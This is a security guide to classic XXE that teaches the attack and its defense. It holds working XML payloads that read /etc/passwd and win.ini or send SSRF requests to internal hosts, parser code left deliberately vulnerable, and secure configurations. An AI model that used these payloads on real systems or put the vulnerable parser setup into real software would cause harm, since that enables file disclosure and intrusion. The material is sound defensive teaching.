Classic XXE (Direct Entity Expansion)
Understanding direct XML external entity attacks where entity content is reflected in the application's response, allowing immediate data exfiltration.
Overview
Classic XXE (also called in-band XXE) occurs when an XML parser processes external entities and includes their content in the application's response. This is the most straightforward form of XXE attack, where the attacker can immediately see the results of the entity expansion.
When exploited successfully, Classic XXE allows attackers to:
- Read arbitrary files from the server's filesystem
- Perform Server-Side Request Forgery (SSRF) attacks
- Cause Denial of Service (DoS)
- In some cases, achieve Remote Code Execution
Classic XXE findings are commonly rated Critical (for example, CVSS 9.1) because they are easy to exploit and have severe impact; the exact score depends on the affected application.
How Classic XXE Works
The attack follows these steps:
- Attacker crafts malicious XML: Creates an XML document with a DOCTYPE declaration containing an external entity definition
- External entity references a resource: The entity points to a local file (file:///) or a network resource (http://)
- Application parses XML: The vulnerable application processes the XML with an insecurely configured parser
- Parser retrieves content: The XML parser automatically retrieves the referenced resource
- Content reflected in response: The expanded entity content appears in the application's response
- Attacker reads data: The attacker extracts sensitive information from the response
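The expansion step can be observed safely with an internal entity, which needs no file or network access. The following is a minimal sketch using only the Python standard library; the entity name greeting and its value are made up for illustration. A parser that resolves external entities performs the same substitution, except that the replacement text is fetched from the SYSTEM URI.

```python
import xml.etree.ElementTree as ET

# Hypothetical document: an internal entity stands in for the external one
# an attacker would declare with SYSTEM "file:///...".
DOC = """<!DOCTYPE foo [
  <!ENTITY greeting "hello from the DTD">
]>
<root>
  <data>&greeting;</data>
</root>"""


def expanded_data(xml_text):
    """Parse the document and return the text of <data> after entity expansion."""
    root = ET.fromstring(xml_text)
    return root.find("data").text


print(expanded_data(DOC))  # hello from the DTD
```

The application never sees the reference &greeting; itself, only the substituted text, which is why reflected output exposes whatever the entity resolved to.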
Vulnerable Code Examples
These code examples show how XXE vulnerabilities occur when developers parse XML without proper security configuration:
Vulnerable Java Code
// VULNERABLE CODE - DO NOT USE IN PRODUCTION
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import java.io.StringReader;

public class VulnerableXmlParser {
    public Document parseXml(String xmlInput) throws Exception {
        // Default configuration - VULNERABLE!
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        DocumentBuilder builder = factory.newDocumentBuilder();

        // This will process external entities by default
        Document doc = builder.parse(
            new InputSource(new StringReader(xmlInput))
        );

        return doc;
    }
}
Vulnerable Python Code
# VULNERABLE CODE - DO NOT USE IN PRODUCTION
import xml.etree.ElementTree as ET

from lxml import etree


def parse_xml(xml_string):
    # Standard-library ElementTree does not fetch external entities
    # (it raises ParseError when one is referenced), but it still expands
    # internal entities, so entity-expansion DoS can still apply.
    root = ET.fromstring(xml_string)
    return root


def parse_xml_lxml(xml_string):
    # VULNERABLE - lxml releases before 5.0 resolve external entities
    # by default; resolve_entities=True makes that behavior explicit.
    parser = etree.XMLParser(resolve_entities=True)
    root = etree.fromstring(xml_string, parser)
    return root
Attack Payload: File Disclosure
This payload demonstrates reading /etc/passwd on Linux systems:
Linux File Disclosure Payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>
Windows File Disclosure Payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
]>
<root>
  <data>&xxe;</data>
</root>
SSRF Attack Payload
This payload makes the server send a request to an internal network resource:
SSRF Payload Example
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://internal-server:8080/admin">
]>
<root>
  <data>&xxe;</data>
</root>
Expected Response
When the attack succeeds, the application's response will contain the file contents or internal server response:
Vulnerable Response Example
<root>
  <data>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...
  </data>
</root>
Secure Configuration
To prevent XXE attacks, you must explicitly disable external entity processing and DTD processing:
Secure Java Configuration
// SECURE CODE
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import java.io.StringReader;

public class SecureXmlParser {
    public Document parseXml(String xmlInput) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

        // Disable DOCTYPE declarations entirely (most secure)
        factory.setFeature(
            "http://apache.org/xml/features/disallow-doctype-decl",
            true
        );

        // If you can't disable DOCTYPE, disable external entities
        factory.setFeature(
            "http://xml.org/sax/features/external-general-entities",
            false
        );
        factory.setFeature(
            "http://xml.org/sax/features/external-parameter-entities",
            false
        );

        // Disable external DTDs
        factory.setFeature(
            "http://apache.org/xml/features/nonvalidating/load-external-dtd",
            false
        );

        // Disable XInclude
        factory.setXIncludeAware(false);

        // Disable expanding entity references
        factory.setExpandEntityReferences(false);

        DocumentBuilder builder = factory.newDocumentBuilder();
        Document doc = builder.parse(
            new InputSource(new StringReader(xmlInput))
        );

        return doc;
    }
}
Secure Python Configuration
# SECURE CODE
from lxml import etree
from defusedxml import ElementTree as DefusedET


# Option 1: Use defusedxml (recommended)
def parse_xml_safe(xml_string):
    # defusedxml automatically disables dangerous features
    root = DefusedET.fromstring(xml_string)
    return root


# Option 2: Configure lxml securely
def parse_xml_lxml_safe(xml_string):
    # Create parser with disabled entity resolution
    parser = etree.XMLParser(
        resolve_entities=False,
        no_network=True,
        dtd_validation=False,
        load_dtd=False
    )
    root = etree.fromstring(xml_string, parser)
    return root
Impact and Risk
Classic XXE vulnerabilities have severe security implications:
Confidentiality Impact: HIGH
- Access to sensitive files (/etc/passwd, /etc/shadow, application config files)
- Database credentials and API keys
- Source code and intellectual property
- User data and PII
Integrity Impact: LOW-MEDIUM
- Usually limited to data exfiltration
- Can lead to SSRF attacks that modify internal state
Availability Impact: MEDIUM-HIGH
- Billion Laughs attack can cause DoS
- Resource exhaustion from large file reads
- System crashes from parsing malformed data
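To give a sense of scale for the Billion Laughs case, the arithmetic can be sketched as follows. This assumes the commonly circulated form of the payload: a base entity containing "lol" and nine further entities, each referencing the previous one ten times. The function name and parameters are illustrative only; nothing is actually expanded.

```python
def expanded_length(base_text, levels, fanout):
    """Length in characters of the top-level entity after full expansion.

    Each level references the previous entity `fanout` times, so the base
    text is repeated fanout ** levels times.
    """
    return len(base_text) * fanout ** levels


size = expanded_length("lol", levels=9, fanout=10)
print(f"{size:,} characters")  # 3,000,000,000 characters
```

A payload of under a kilobyte therefore asks the parser to materialize roughly 3 GB of text, which is why entity expansion limits matter even when external entities are disabled.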
Real-World Examples:
- Reading cloud metadata endpoints (AWS, Azure, GCP)
- Accessing internal admin panels
- Exfiltrating database backups
- Reading application source code
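Which of these impacts a given payload is aiming for can often be read from the scheme of each entity's system identifier. The sketch below uses Expat's entity declaration callback from the Python standard library to list declared external entities without resolving them; no external-entity handler is registered, so nothing is fetched. The function name is hypothetical, and the payload uses the link-local address commonly associated with cloud metadata services as an example target.

```python
import xml.parsers.expat
from urllib.parse import urlsplit


def list_external_entities(xml_text):
    """Return (entity_name, scheme, system_id) for each external entity declared."""
    found = []

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # Expat passes value=None for external entities; system_id holds the URI.
        if value is None and system_id is not None:
            found.append((name, urlsplit(system_id).scheme, system_id))

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_text, True)
    return found


payload = """<!DOCTYPE foo [
  <!ENTITY local SYSTEM "file:///etc/passwd">
  <!ENTITY meta SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root><data>&local;&meta;</data></root>"""

for name, scheme, target in list_external_entities(payload):
    print(name, scheme, target)
```

A file scheme points at local file disclosure, while http or https points at SSRF against internal services or metadata endpoints.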
Detection and Testing
To test for Classic XXE vulnerabilities:
- Identify XML input points: API endpoints, file uploads, SOAP services
- Test with basic payload: Submit XML with external entity referencing a known file
- Observe response: Check if file contents appear in the response
- Test SSRF: Try referencing an attacker-controlled server to confirm outbound requests
- Automated scanning: Use Burp Suite, OWASP ZAP, or custom scripts
Key indicators of vulnerability:
- Application accepts XML input
- Response contains expanded entity content
- Application makes outbound requests to attacker-controlled servers
- Error messages reveal file paths or entity processing
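The "observe response" step can be partly automated by searching the response body for content typical of the files used in the test payloads. This is a rough sketch: the marker patterns and the function name are assumptions chosen for /etc/passwd and win.ini, and a real test suite would need markers for whatever files it requests.

```python
import re

# Hypothetical markers: a root entry with UID/GID 0 for /etc/passwd, and
# section headers that typically appear in win.ini.
DISCLOSURE_MARKERS = {
    "/etc/passwd": re.compile(r"^[ \t]*root:[^:]*:0:0:", re.MULTILINE),
    "win.ini": re.compile(r"^[ \t]*\[(fonts|extensions)\]", re.MULTILINE | re.IGNORECASE),
}


def find_disclosure_markers(response_body):
    """Return the names of known files whose typical content appears in the body."""
    return [
        name
        for name, pattern in DISCLOSURE_MARKERS.items()
        if pattern.search(response_body)
    ]


body = """<root>
  <data>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  </data>
</root>"""

print(find_disclosure_markers(body))  # ['/etc/passwd']
```

A match is a strong hint rather than proof; a response that merely echoes the payload text unexpanded will not match these patterns.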
Remediation Summary
- Priority 1 (Critical): Disable DOCTYPE declarations entirely
- Priority 2 (High): Disable external entity processing
- Priority 3 (High): Disable DTD processing
- Priority 4 (Medium): Implement input validation and allowlisting
- Priority 5 (Medium): Use secure XML parsing libraries (e.g., defusedxml)
- Priority 6 (Low): Implement WAF rules to detect XXE patterns
Refer to language-specific prevention guides for detailed implementation instructions.
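Where a dedicated library is not available, Priority 1 can be approximated with a pre-parse check that refuses any document containing a DOCTYPE. The following is a minimal sketch using Expat from the Python standard library; the exception class and function name are hypothetical, and it is meant as an illustration of the idea rather than a replacement for a maintained library such as defusedxml.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def reject_doctype(xml_text):
    """Raise DoctypeForbidden if xml_text declares a DOCTYPE.

    Malformed XML still raises xml.parsers.expat.ExpatError.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Raising inside the handler aborts parsing before any entity is used.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_text, True)


malicious = """<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>"""

try:
    reject_doctype(malicious)
except DoctypeForbidden as exc:
    print("rejected:", exc)
```

Calling reject_doctype on input before passing it to the application's real parser means legitimate documents without a DTD pass through unchanged, while every payload shown in this guide is refused.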